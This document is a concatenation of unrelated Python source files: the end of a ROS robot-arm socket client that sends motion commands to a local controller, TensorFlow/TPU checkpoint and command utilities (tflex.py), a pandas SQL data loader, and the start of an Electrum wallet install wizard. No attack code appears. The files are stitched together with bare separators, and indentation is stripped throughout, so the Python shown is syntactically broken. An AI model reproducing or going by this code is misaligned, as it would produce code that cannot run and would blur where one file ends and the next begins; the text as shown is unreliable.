b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server side end-------
##----------socket packet transmission--------------##
def Socket_command():
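    # Build the TCP command string that matches the current socket_cmd state
    # (PtP, Line, SetVel, Delay or speed mode) and send it to the control PC
    # over the already-connected Socket.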
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
        #-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 5 ## reset to the initial mode state
Socket.send(data.encode('utf-8')) # send the command string over the socket (utf-8 encoded for Python 3)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag,arm_mode_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
#start_input = int(input('Press 1 to start transmission, 3 to exit: ')) # prompt for the start command
start_input = 1
if start_input==1:
while 1:
##--------------- socket arm command transmission -----------------
#if Arm_feedback == 0:
if arm_mode_flag == True:
arm_mode_flag = False
#------- select mode --------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 5 ## reset to the initial mode state
Socket.send(data.encode('utf-8')) # send the command string over the socket (utf-8 encoded for Python 3)
feedback_str = Socket.recv(1024)
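# Feedback layout as inferred from the checks below (an assumption, not a
# documented protocol): the byte at index 2 carries the arm state as an ASCII
# character ('F' = ready, 'T' = busy, '6' = strategy finished), and the byte at
# index 4 carries the sent flag ('0' or '1').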
# the arm side reports its current state
if str(feedback_str[2]) == '70': # 'F': the arm is Ready and can accept the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84': # 'T': the arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54': # '6': the strategy has finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
# check the transmission flag
if str(feedback_str[4]) == '48': # returned '0', false
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49': # returned '1', true
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##--------------- socket arm command transmission end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## worker thread
def thread_test():
socket_client()
## worker thread end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## reset to the initial mode state
t = threading.Thread(target=thread_test)
t.start() # start the socket client thread
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent / outdent line
|
tflex.py
|
import tensorflow as tf
import numpy as np
from glob import glob
import os
import re
from tensorflow.python import pywrap_tensorflow
import tqdm
import h5py
import shutil
import tempfile
import traceback
import math
from tensorflow.contrib import tpu
from tensorflow.contrib.cluster_resolver import TPUClusterResolver
from tensorflow.python.framework import dtypes
import sys
import threading
def parallelize(xs, thunk, *args):
threads = []
for x in xs:
thread = threading.Thread(target=thunk, args=(x, *args))
thread.start()
threads.append(thread)
return threads
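# Illustrative usage sketch (the names work_items and handle_item are
# assumptions): each item is processed as handle_item(item, shared) on its own
# thread, and the caller joins the returned threads.
#   threads = parallelize(work_items, handle_item, shared)
#   for t in threads:
#       t.join()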
# http://stackoverflow.com/questions/1624883/alternative-way-to-split-a-list-into-groups-of-n
import itertools
def group(n, iterable, fillvalue=None):
"group(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
def tuples(*args, **kws):
return [x for x in group(*args, **kws)]
class Namespace(object):
pass
state = Namespace()
def get_tpu_addr(tpu_name=None):
# Get the TPU's location
if tpu_name is not None:
return TPUClusterResolver(tpu_name).get_master()
if 'COLAB_TPU_ADDR' in os.environ:
return TPUClusterResolver().get_master()
elif 'TPU_NAME' in os.environ:
return TPUClusterResolver(os.environ['TPU_NAME']).get_master()
def get_session_target(target='auto'):
if target == 'auto':
target = get_tpu_addr()
elif target is not None:
target = get_tpu_addr(target)
if target is not None:
print("Using TPU %s" % target)
return target
class Session(tf.Session):
def __init__(self, target='auto', graph=None, config=None):
target = get_session_target(target)
super().__init__(target, graph=graph, config=config)
self.target = target
self.config = config
class MonitoredSession(tf.train.MonitoredSession):
def __init__(self, target='auto', graph=None, config=None):
target = get_session_target(target)
super().__init__(target, graph=graph, config=config)
self.target = target
self.config = config
state.split_param_count = 1e4
def split_by_params(vs, n=None, f=None):
if n is None:
n = state.split_param_count
if f is None:
f = lambda x: np.prod(x.shape.as_list())
i = 0
xs = []
for variable in vs:
xs.append(variable)
count = f(variable)
i += count
if i >= n:
yield xs
xs = []
i = 0
yield xs
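# Illustrative sketch of how split_by_params is meant to be consumed (assumes a
# default graph with trainable variables and an active session named sess):
# variables are yielded in chunks of roughly state.split_param_count parameters
# so that each fetch or assignment stays small.
#   for chunk in split_by_params(tf.trainable_variables()):
#       values = sess.run(chunk)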
def latest_checkpoint(checkpoint_dir, latest_filename=None):
paths = [x for x in glob(os.path.join(checkpoint_dir, 'model-*.*')) if not x.endswith(".tmp")]
ctrs = np.array([[int(y) for y in re.findall(r'model-([0-9]+)(?:-[0-9]+)?[.](?:npy|hdf5)', x)] for x in paths]).flatten()
if len(ctrs) <= 0:
ckpt = tf.train.latest_checkpoint(checkpoint_dir, latest_filename=latest_filename)
return ckpt
ctr = ctrs.max()
return os.path.join(checkpoint_dir, 'model-{}').format(ctr)
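# Illustrative example (file names are assumptions): with model-1000.hdf5 and
# model-2500-0.npy present in checkpoint_dir, the regex extracts counters 1000
# and 2500 and the function returns os.path.join(checkpoint_dir, 'model-2500').
# If no matching files exist it falls back to tf.train.latest_checkpoint().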
def truncate_value(variable, value, reshape=True):
if not reshape:
return value
shape = variable.shape.as_list()
params = np.prod(shape)
params2 = np.prod(value.shape)
if params == params2:
return value
if params2 > params:
print('Truncating {} from shape {} to shape {}'.format(variable.name, value.shape, shape))
sys.stdout.flush()
value = np.array(value)
value = value.reshape([-1])
value = value[0:params]
value = value.reshape(shape)
else:
print('Expanding {} from shape {} to shape {}'.format(variable.name, value.shape, shape))
sys.stdout.flush()
value = np.array(value)
value = value.reshape([-1])
n = math.ceil(params / params2)
value = np.tile(value, n)
value = value[0:params]
value = value.reshape(shape)
return value
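# Illustrative example of the intended reshape behaviour (shapes are
# assumptions): a checkpoint value with 12 elements loaded into a [2, 5]
# variable is flattened and truncated to 10 elements; a value with 6 elements
# is tiled (2 copies), cut back to 10 elements, and reshaped to [2, 5].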
from tensorflow.core.protobuf import config_pb2
def initialize_tpu(session=None, timeout_in_ms=None):
session = session or tf.get_default_session()
with session.as_default():
op = tpu.initialize_system()
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(op, options=options)
def load(variable, value, session=None, timeout_in_ms=None):
session = session or tf.get_default_session()
ops = variable.initializer
vals = dict([(variable.initializer.inputs[1], value)])
#for x, (k, v) in zip(variables, vals.items()):
# print(x.name, x.shape.as_list(), k, v.shape)
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(ops, vals, options=options)
def eval(variable, session=None, timeout_in_ms=None):
session = session or tf.get_default_session()
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
return session.run(variable, options=options)
def grab_values(variables, reader, reshape=False):
for variable in variables:
name = variable_name(variable).split(':')[0]
value = reader.get_tensor(name)
value = truncate_value(variable, value, reshape=reshape)
yield variable, value
def assign_values(variables, values, session=None, timeout_in_ms=60000):
session = session or tf.get_default_session()
ops = [x.initializer for x in variables]
vals = dict([(x.initializer.inputs[1], value) for x, value in zip(variables, values)]) # TODO: bfloat16 support
#for x, (k, v) in zip(variables, vals.items()):
# print(x.name, x.shape.as_list(), k, v.shape)
options = None
if timeout_in_ms:
options=config_pb2.RunOptions(timeout_in_ms=timeout_in_ms)
session.run(ops, vals, options=options)
def load_snapshot(ckpt, session=None, var_list=None, reshape=False):
session = session or tf.get_default_session()
reader = pywrap_tensorflow.NewCheckpointReader(ckpt)
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = [value for variable, value in grab_values(variables, reader, reshape=reshape)]
assign_values(variables, values, session=session)
def get_variable(name, var_list=None):
name, num = name.split(':') if ':' in name else (name, '0')
num = int(num)
name = os.path.join(tf.get_variable_scope().name, name)
vs = var_list or tf.trainable_variables()
for x in vs:
if x.name.startswith(name + ':%d' % num):
return x
def load_weights(ckpt, session=None, var_list=None, reshape=False):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
files = list(sorted(glob(ckpt + '-*.npy')))
for out in tqdm.tqdm(files):
for name, value in np.load(out, allow_pickle=True):
variable = get_variable(name)
if variable is None:
print('Warning: variable %s not loaded' % name)
else:
value = truncate_value(variable, value, reshape=reshape)
variable.load(value, session)
def load_variables(ckpt, session=None, var_list=None, reshape=False):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
with h5py.File(ckpt, "r") as f:
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = [truncate_value(x, f[variable_name(x)], reshape=reshape) for x in variables]
assign_values(variables, values, session=session)
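# Illustrative usage sketch (the checkpoint path is an assumption): restore the
# trainable variables from an hdf5 snapshot produced by save_variables below.
#   sess = tf.Session()
#   load_variables('checkpoint/model-100.hdf5', session=sess)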
def maketree(path):
try:
os.makedirs(path)
except:
pass
state.cache_ops = {}
def cast_variables(variables, graph=None, cache_ops=None):
if graph is None:
graph = tf.get_default_graph()
if cache_ops is None:
cache_ops = state.cache_ops
if graph not in cache_ops:
cache_ops[graph] = {}
cache = cache_ops[graph]
ops = []
for variable in variables:
if variable in cache:
op = cache[variable]
elif variable.dtype == dtypes.bfloat16_ref or variable.dtype == tf.bfloat16:
op = tf.cast(variable, tf.float32)
else:
op = variable
cache[variable] = op
ops.append(op)
return ops
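# Descriptive note (inferred from the code above): bfloat16 variables are
# wrapped in a float32 cast op, and the resulting ops are cached per graph so
# repeated snapshots do not keep adding cast nodes; other variables are passed
# through unchanged.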
import re
def variable_name(variable):
if re.match(r'core[0-9]+/', variable.name):
return variable.name.split('/', 1)[-1]
return variable.name
def save_variables(ckpt, session=None, var_list=None):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
maketree(os.path.dirname(ckpt))
fname = ckpt+'.tmp'
with h5py.File(fname, "w") as f:
for variables in tqdm.tqdm(list(split_by_params(vs))):
ops = cast_variables(variables)
values = session.run(ops)
for value, variable in zip(values, variables):
name = variable_name(variable)
shape = variable.shape.as_list()
dtype = variable.dtype
dset = f.create_dataset(name, shape, dtype=np.float32)
dset[:] = value
print('Writing snapshot %s' % ckpt)
os.rename(ckpt+'.tmp', ckpt)
def fetch_variables(session=None, var_list=None):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
values = session.run(variables)
yield variables, values
def partition_variables(session=None, var_list=None):
session = session or tf.get_default_session()
vs = var_list or tf.trainable_variables()
for variables in tqdm.tqdm(list(split_by_params(vs))):
yield variables
class Saver(object):
def __init__(
self,
var_list=None,
reshape=False,
sharded=False,
max_to_keep=5,
keep_checkpoint_every_n_hours=10000.0,
name=None,
restore_sequentially=False,
saver_def=None,
builder=None,
defer_build=False,
allow_empty=False,
write_version=tf.train.SaverDef.V2,
pad_step_number=False,
save_relative_paths=False,
filename=None):
self.var_list = var_list
self.reshape = reshape
self.sharded = sharded
self.max_to_keep = max_to_keep
self.keep_checkpoint_every_n_hours = keep_checkpoint_every_n_hours
self.name = name
self.restore_sequentially = restore_sequentially
self.saver_def = saver_def
self.builder = builder
self.defer_build = defer_build
self.allow_empty = allow_empty
self.write_version = write_version
self.pad_step_number = pad_step_number
self.save_relative_paths = save_relative_paths
self.filename = filename
self.checkpoints = []
def restore(self, sess, save_path):
if save_path.endswith('.ckpt'):
load_snapshot(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif save_path.endswith('.hdf5'):
load_variables(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif os.path.exists(save_path + '.npy') or os.path.exists(save_path + '-0.npy'):
load_weights(save_path, session=sess, var_list=self.var_list, reshape=self.reshape)
elif os.path.exists(save_path + '.hdf5'):
load_variables(save_path + '.hdf5', session=sess, var_list=self.var_list, reshape=self.reshape)
else:
raise Exception("Can't load checkpoint %s" % save_path)
def save(self,
sess,
save_path,
global_step=None,
latest_filename=None,
meta_graph_suffix="meta",
write_meta_graph=True,
write_state=True,
strip_default_attrs=False,
save_debug_info=False):
if global_step is not None:
name = '%s-%d.hdf5' % (save_path, global_step)
else:
name = '%s.hdf5' % save_path
save_variables(name, session=sess, var_list=self.var_list)
self.checkpoints.append(name)
if self.max_to_keep > 0:
while len(self.checkpoints) > self.max_to_keep:
fname = self.checkpoints[0]
if fname != name:
print('Truncating %s' % fname)
try:
with open(fname, "wb") as f:
pass
except:
print('Failed to truncate %s' % fname)
self.checkpoints = self.checkpoints[1:]
def fetch(self, sess, var_list=None):
if var_list is None:
var_list = self.var_list
for variables, values in fetch_variables(session=sess, var_list=var_list):
yield variables, values
def variables(self, sess, var_list=None):
if var_list is None:
var_list = self.var_list
for variables in partition_variables(session=sess, var_list=var_list):
yield variables
def assign(self, sess, variables, values):
return assign_values(variables, values, session=sess)
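# Illustrative usage sketch of this Saver (paths assume an active tf.Session
# named sess): saving with a global step writes an hdf5 snapshot, and snapshots
# beyond max_to_keep are truncated to zero-length files rather than deleted.
#   saver = Saver(max_to_keep=2)
#   saver.save(sess, 'checkpoint/model', global_step=100)   # checkpoint/model-100.hdf5
#   saver.restore(sess, 'checkpoint/model-100.hdf5')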
class Commands(object):
def __init__(self, path='commands'):
self.path = path
self.commands = []
self.args = []
self.keys = {}
self.frozen = False
def has(self, name, **keys):
if 'action' in keys:
action = keys.pop('action')
for name1, action1 in self.commands:
if name == name1 and action1 == action:
return True
else:
for name1, action1 in self.commands:
if name == name1:
return True
return False
def add(self, name, action=None):
if not self.has(name=name, action=action):
self.commands.append((name, action))
full = self.full_path(name)
maketree(full)
def full_path(self, name):
return os.path.join(self.path, name)
def check(self, *args, **keys):
if not self.frozen:
heartbeat()
ops = []
seen = set()
for name, action in self.commands:
full = self.full_path(name)
if not os.path.isdir(full):
if name not in seen:
seen.add(name)
ops.append(name)
for op in ops:
self.run(op, *args, **keys)
return ops
def run(self, op):
ran = False
for name, action in self.commands:
if name == op:
print('Running command', name, action)
if not ran:
full = self.full_path(op)
maketree(full)
ran = True
if action:
action()
if not ran:
raise Exception('Commands.execute failed: no such command: {}'.format(op))
def run_with_args(self, op, *args, **keys):
with CommandArgs(*args, **keys):
return self.run(op)
commander = None
def commands(**keys):
global commander
if commander is None:
commander = Commands()
cmds = keys.pop('commands') if 'commands' in keys else None
if cmds is not None:
for cmd in cmds:
action = None
if isinstance(cmd, str):
name = cmd
elif len(cmd) >= 2:
name, action = cmd
elif len(cmd) >= 1:
name = cmd[0]
else:
continue
commander.add(name=name, action=action)
return commander
class CommandArgs(object):
def __init__(self, *args, **keys):
self.args = list(args)
self.keys = keys.copy()
self.cmdr = commands()
def __enter__(self):
self.args_prev = self.cmdr.args
self.keys_prev = self.cmdr.keys
self.cmdr.args = self.args
self.cmdr.keys = self.keys
def __exit__(self, *excinfo):
self.cmdr.args = self.args_prev
self.cmdr.keys = self.keys_prev
def check_commands():
try:
cmdr = commands()
return cmdr.check()
except:
traceback.print_exc()
def check_commands_with_args(*args, **keys):
try:
cmdr = commands()
with CommandArgs(*args, **keys):
return cmdr.check()
except:
traceback.print_exc()
def add_command(name, action=None, **keys):
cmdr = commands()
return cmdr.add(name=name, action=action)
def register_command(*args, **keys):
fn = args[0]
if isinstance(fn, str):
add_command(fn)
else:
name = fn.__qualname__
name = name.replace('.<locals>.', '_command_')
if name.endswith('_command_save'):
name = 'save'
name = name.replace('___', '/')
action = fn
print(name, action)
add_command(name, action)
return fn
def has_command(name):
cmdr = commands()
return cmdr.has(name)
def run_command(command_name):
cmdr = commands()
return cmdr.run(command_name)
def run_command_with_args(command_name, *args, **keys):
cmdr = commands()
return cmdr.run_with_args(command_name, *args, **keys)
def command_arg(x, unset=None):
cmdr = commands()
if isinstance(x, int):
try:
return cmdr.args[x]
except:
return unset
else:
if x in cmdr.keys:
return cmdr.keys[x]
return unset
def command_args():
cmdr = commands()
return cmdr.args, cmdr.keys
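# Illustrative sketch of the filesystem-based command protocol (the command
# name below is an assumption): registering a command creates commands/<name>/
# on disk; removing that directory externally marks the command to run on the
# next check_commands() call, which then recreates the directory.
#   @register_command
#   def reload_config():
#       print('reloading')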
@register_command
def attach_debugger():
import pdb
pdb.set_trace()
from pprint import pprint
@register_command
def print_status():
args, props = command_args()
for k, v in enumerate(args):
pprint(v)
for k, v in props.items():
pprint({k: v})
#
# return current UTC timestamp.
#
def utc():
from datetime import datetime
d = datetime.utcnow()
import calendar
return calendar.timegm(d.utctimetuple())
state.no_heartbeat = True
def heartbeat():
if state.no_heartbeat:
return
pongfile=os.environ['PONG'] if 'PONG' in os.environ else 'pong.txt'
with open(pongfile, "a+") as f:
nonce = os.urandom(8).hex()
now=utc()
out="pid{}_time{}_nonce{}\n".format(os.getpid(), now, nonce)
#print("PONG! Writing {} to {}".format(out, pongfile))
f.write(out)
f.flush()
import time
@register_command
def freeze_forever():
cmdr = commands()
if cmdr.frozen:
print("Already frozen.")
return
prev = cmdr.frozen
cmdr.frozen = True
print('Simulating a freeze; going into an infinite loop:')
start = time.time()
try:
while not should_quit():
elapsed = time.time() - start
print('Frozen for {}s'.format(elapsed))
time.sleep(1)
check_commands()
finally:
cmdr.frozen = prev
_quit = False
import sys
import posix
state.quit_immediately = True
@register_command
def quit():
global _quit
if _quit or state.quit_immediately:
posix._exit(1)
else:
_quit = True
@register_command
def quit_immediately():
posix._exit(1)
def should_quit():
return _quit
@register_command
def throw_exception():
raise Exception("This exception should be caught and logged by the tflex command system")
|
model.py
|
import pandas as pd
from sachima import conf
import os
import importlib
from sachima.params import set_sql_params
from sachima.log import logger
from sachima.wrappers import timer
# from tqdm import tqdm
import io
import time
import logging
import sys
import threading
import itertools
@timer
def sql(sql, datatype):
"""
return DataFrame
"""
logger.info("running sql {}".format(sql))
return pd.read_sql(sql, datatype)
class Data:
def __init__(self, dataname, datatype, params, prefunc):
"""
dataname: sql filename
datatype: db engine or filetype in str
"""
self.source = dataname
self.type = datatype
title = dataname + " | " + str(datatype)
logger.info("=" * 12 + " " + title + " " + "=" * 12)
if datatype in ("xls", "xlsx"):
self.data = pd.read_excel(
os.path.join(conf.get("PROJ_DIR"), dataname)
)
elif datatype in ("csv", "txt"):
self.data = pd.read_csv(
os.path.join(conf.get("PROJ_DIR"), dataname)
)
elif datatype in ("api",):
api_cls = importlib.import_module(
"services." + dataname, package=".."
)
api = api_cls.Api()
self.data = api.data
elif datatype in ("json",):
self.data = pd.read_json(
os.path.join(conf.get("PROJ_DIR"), dataname)
)
else:
# read sql file from ./sqls
str_sql = open(
os.path.join(conf.get("PROJ_DIR"), "sqls", dataname),
encoding="utf-8",
).read()
sql = str_sql
# pre process before sql loaded
if prefunc:
sql = prefunc(set_sql_params(str_sql, params), params)
else:
sql = set_sql_params(str_sql, params)
self.data = _get_df(sql, datatype, dataname)
def animate(dataname, log):
t = threading.current_thread()
elapsed_time = 0
for c in itertools.cycle(["|", "/", "-", "\\"]):
if getattr(t, "Done", True):
break
sys.stdout.write(
"\r<{}> running {} {} ms\r".format(dataname, c, elapsed_time)
)
sys.stdout.flush()
time.sleep(0.1)
elapsed_time += 100
# log("<{}> parsing elapsed time: {} ms".format(dataname, elapsed_time))
log("\r")
# sys.stdout.write("\r\n Done! ")
def _get_df(sql, datatype, dataname):
animate_thread = threading.Thread(
target=animate, args=(dataname, logger.info)
)
animate_thread.daemon = True
animate_thread.Done = False
animate_thread.start()
try:
start = time.time()
df = pd.read_sql(sql, datatype)
consumed_time = time.time() - start
logger.info("<{}> time: {} secs".format(dataname, consumed_time))
except Exception as e:
raise e
finally:
animate_thread.Done = True # no matter how break the animate loop
# logger.info("<{}> start loading data... ".format(dataname))
# # df = pd.concat(first + [chunk for chunk in tqdm(chunks, total=200)])
# logger.info(
# "<{}> loading data elapsed time: {} seconds".format(
# dataname, loading_data_elapsed_time
# )
# )
return df
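# Illustrative usage sketch (the engine, file name, and parameter names are
# assumptions): for a non-file datatype, dataname is read from PROJ_DIR/sqls,
# parameterised via set_sql_params, and loaded through the animated _get_df().
#   from sqlalchemy import create_engine
#   engine = create_engine('sqlite:///example.db')
#   d = Data('report.sql', engine, params={'start': '2020-01-01'}, prefunc=None)
#   df = d.data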
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
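# Descriptive note (inferred from the decorator above): methods wrapped with
# @wizard_dialog do not return their value to the caller; the result is passed
# to the run_next callback, GoBack steps the wizard back (or closes it), and
# UserCancelled silently aborts the current page.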
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
